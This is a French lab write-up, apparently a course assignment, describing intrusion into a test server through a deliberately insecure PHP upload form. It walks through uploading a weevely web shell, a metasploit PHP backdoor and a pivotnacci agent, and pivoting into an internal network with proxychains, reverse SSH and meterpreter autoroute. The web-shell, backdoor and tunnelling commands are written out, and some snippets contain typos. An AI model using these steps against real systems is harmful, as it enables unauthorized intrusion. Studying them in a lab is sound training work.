---
tags: DM7
---
# PARTIE 1 - Intrusion sur INFRA01
## NGINX
Dans le dossier `/var/www/html` de INFRA01, on dépose le fichier `test.php` qui contient le formulaire de téléchargement non sécurisé.
On crée aussi un dossier uploads, qui sera utilisé pour stocker les fichiers téléchargés sur INFRA01.
On donne à ces deux fichiers les permissions suivantes:
avec les commandes
```
chmod 755 test.php
chmod 777 uploads
```
Puis on modifie la ligne 12 du script `test.php` pour que les fichiers téléchargés arrivent dans le dossier `uploads`:
`$uploaddir = = '/var/www/html/uploads'`
Afin de pouvoir utiliser l'interface du fichier `test.php` sur notre serveur web, nous allons utiliser fast-cgi, pour ce faire on ajoute dans le fichier de configuration de notre site nginx (/etc/nginx/sites-enabled/main-website.conf) les lignes suivantes:
```
location ~ \.php${
try_files $uri =404;
fastcgi_pass unix:/run/php7.4-fpm.sock;
fastcgi_index index.php;
fastrcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
```
On peut ensuite redémarrer nginx, puis constater depuis une autre machine que la page de téléchargement est mise en place:
## Intrusion, Weevely
Pour installer weevely, on clone le dépôt de weevely via la commande
`git clone https://github.com/epinna/weevely3.git`, puis
`cd weevely3`
La génération d'un web shell se fait ensuite via la commande
`./weevely.py generate PASSWORD webshell.php`.
Il nous suffit ensuite de télécharger le webshell via la page test.php du serveur web.
On navigue ensuite sur la page `https://172.19.111.107/html/uploads/webshell.php` pour lancer le script généré par weevely, enfin pour avoir un accès à la machine on utilise la commande weevely suivante:
`./weevely https://172.19.111.107/html/uploads/webshell.php PASSWORD`.
On peut ensuite lancer les commandes « ls, pwd, ip a, uname -a, whoami, id ».
## Pivot 1
### Proxychains
Proxychains étant déjà installé sur kali-linux, il nous suffit de configurer l'outil, avec son fichier de configuration `/etc/proxychains4.conf`. Le proxy par défaut est configuré pour le réseau tor avec la ligne 115 `socks4 127.0.0.1 9050`. Il suffit de remplacer cette ligne par `http 127.0.0.1 8080` pour avoir notre proxy sur le port 8080
### FoxyProxy
FoxyProxy s'installe depuis la page des addons de firefox.
Une fois installé on ajoute un nouveau proxy http avec les paramètres ci-dessous:
On lance un shell via weevely, et on met en place un proxy avec la commande `:net_proxy`
On remarque que le proxy est configuré sur le port 8080 du localhost.
On actve le proxy de firefox précédement créé via FoxyProxy.
Puis, depuis la machine kali, on se rend sur l'addresse de l'interface d'administration du Pfsense dans la DMZ `https://192.168.3.1`:
On constate qu'elle est bien joignable via son ip privée.
### nmap
En conservant la configuration de weevely précédente, on essaie de faire passer par le proxy un scan réseau nmap, avec la commande suivante:
`proxychains nmap 192.168.3.0/24`
Cependant en utilisant les protocoles `SOCKS4` ou `SOCKS5`, les scans ne sont pas fructueux et donnent l'erreur suivante:
sur toutes les IPs et tous les ports.
En modifiant la configuration de proxychains pour utiliser le protocole HTTP, on obtient un scan où tous les ports sont ouverts, ce qui est faux.
## Pivot 2
Ce pivot a pour but d'ouvrir une session SSH pour se passer de l'utilisation du webshell.
En premier lieu, il est nécessaire - comme demandé dans l'énoncé - de changer la configuration du serveur SSH sur la machine KALI02 pour qu'il écoute sur le port 80. Nous autorisons également la connexion par mot de passe pour permettre la réalisation du pivot.
Fichier : `/etc/ssh/sshd_config`
```shell
Port 80
PasswordAuthentication yes
```
On lance ensuite weevely en ligne de commande :
```shell
./weevely.py https://172.19.111.107/html/uploads/webshell.php pass
```
On lance ensuite la connexion SSH via le webshell :
```
sshpass -p ssh -tt -p 80 kali@ip_kali02 -R 19999
```
En suivant la documentation, il est possible de mettre en place le reverse SSH en place : https://doc.ubuntu-fr.org/tutoriel/reverse_ssh.
Il faut ensuite configurer la proxychain, via le fichier de configuration `/etc/proxychains.conf` sur le kali02 :
```
[ProxyList]
socks 127.0.0.1 19999
```
Le port 19999 correspond au port de l'énoncé.
Ainsi, il est possible de lancer le nmap. L'activation de FroxyProxy se fait de la même manière que pour le pivot 1.
## Pivot 3
Le but de ce pivot est d'utiliser les outils fournis par metasploit pour avoir un accès à la debian et pouvoir pivoter sur les autres machines du sous-réseau.
En premier lieu, sur la machine Kali02, on crée le payload php grâce à msfvenom:
Le payload et ensuite téléchargé sur le serveur grâce au formulaire vulnérable:
Il suffit ensuite de lancer un listener sur msfconsole via les commandes ci-dessous:
En allant sur la page `https://172.19.111.107/html/uploads/php_backdoor.php` on active le payload, et on obtient une session meterpreter comme sur la capture si dessus.
On met notre session en arrière plan via la commande `background` puis, utilisons le module autoroute pour accéder aux autres machines du sous-réseau.
On démarre ensuite un proxy SOCKS5 sur le port 8080.
On édite le fichier de configuration de proxychain (`/etc/proxychains4.conf`) en configurant le proxy avec le protocole `socks5`, l'ip `127.0.0.1` et le port `8080`
On peut par la suite faire un nmap en utilisant `proxychain` pour lister les autres machines sur le sous-réseau.
On constate que les deux machines de notre sous-réseau sont détectées, en faisant un scan sur INFRA01, on retrouve bien les ports ouverts sur la machine:
On réussit à se connecter en SSH à l'interface du Pfsense en connaissant les identifiants. Il est donc important d'utiliser les mots de passes robustes pour rendre difficile l'accès SSH à un attaquant.
## Pivot 4 Pivotnacci
Pour ce pivot, nous avons utilisé l'outil `pivotnacci` disponible ici: `https://github.com/blackarrowsec/pivotnacci.git`.
Cet outil met à disposition des agents HTTP sous trois formats: `.aspx`, `.jsp` et `.php`.
Il donne aussi un serveur SOCKS en python qui va comuniquer avec l'agent sur le serveur web.
Après avoir cloné le dépot git sur kali via la commande
`git clone https://github.com/blackarrowsec/pivotnacci.git`,
on télécharge, toujours via le formulaire, sur la machine debian l'agent `agent.php` disponible dans le dossier /agents du dépot.
On installe les dépendences de l'outil avec: `pip3 install -r requirements.txt` et `python3 setup.py install`.
Pour exécuter l'agent, il suffit de se rendre sur la page `http://172.19.111.107/html/uploads/agent.php` puis, sur kali, de lancer la commande
```bash=
pivotnacci https://172.19.111.107/html/uploads/agent.php --password ""
```
(le mot de passe par défaut est vide)
Le port par défaut de pivotnacci étant le 1080, il convient de changer la configuration de proxychains par `socks5 127.0.0.1 1080`
On peut par la suite effectuer un nmap du réseau local avec la commande
`proxychains nmap 192.168.3.2`
et on obtient le résultat escompté:
pour 192.168.3.2:
et 192.168.3.1:
Google Drive
Gist
Clipboard
Sign in with Wallet
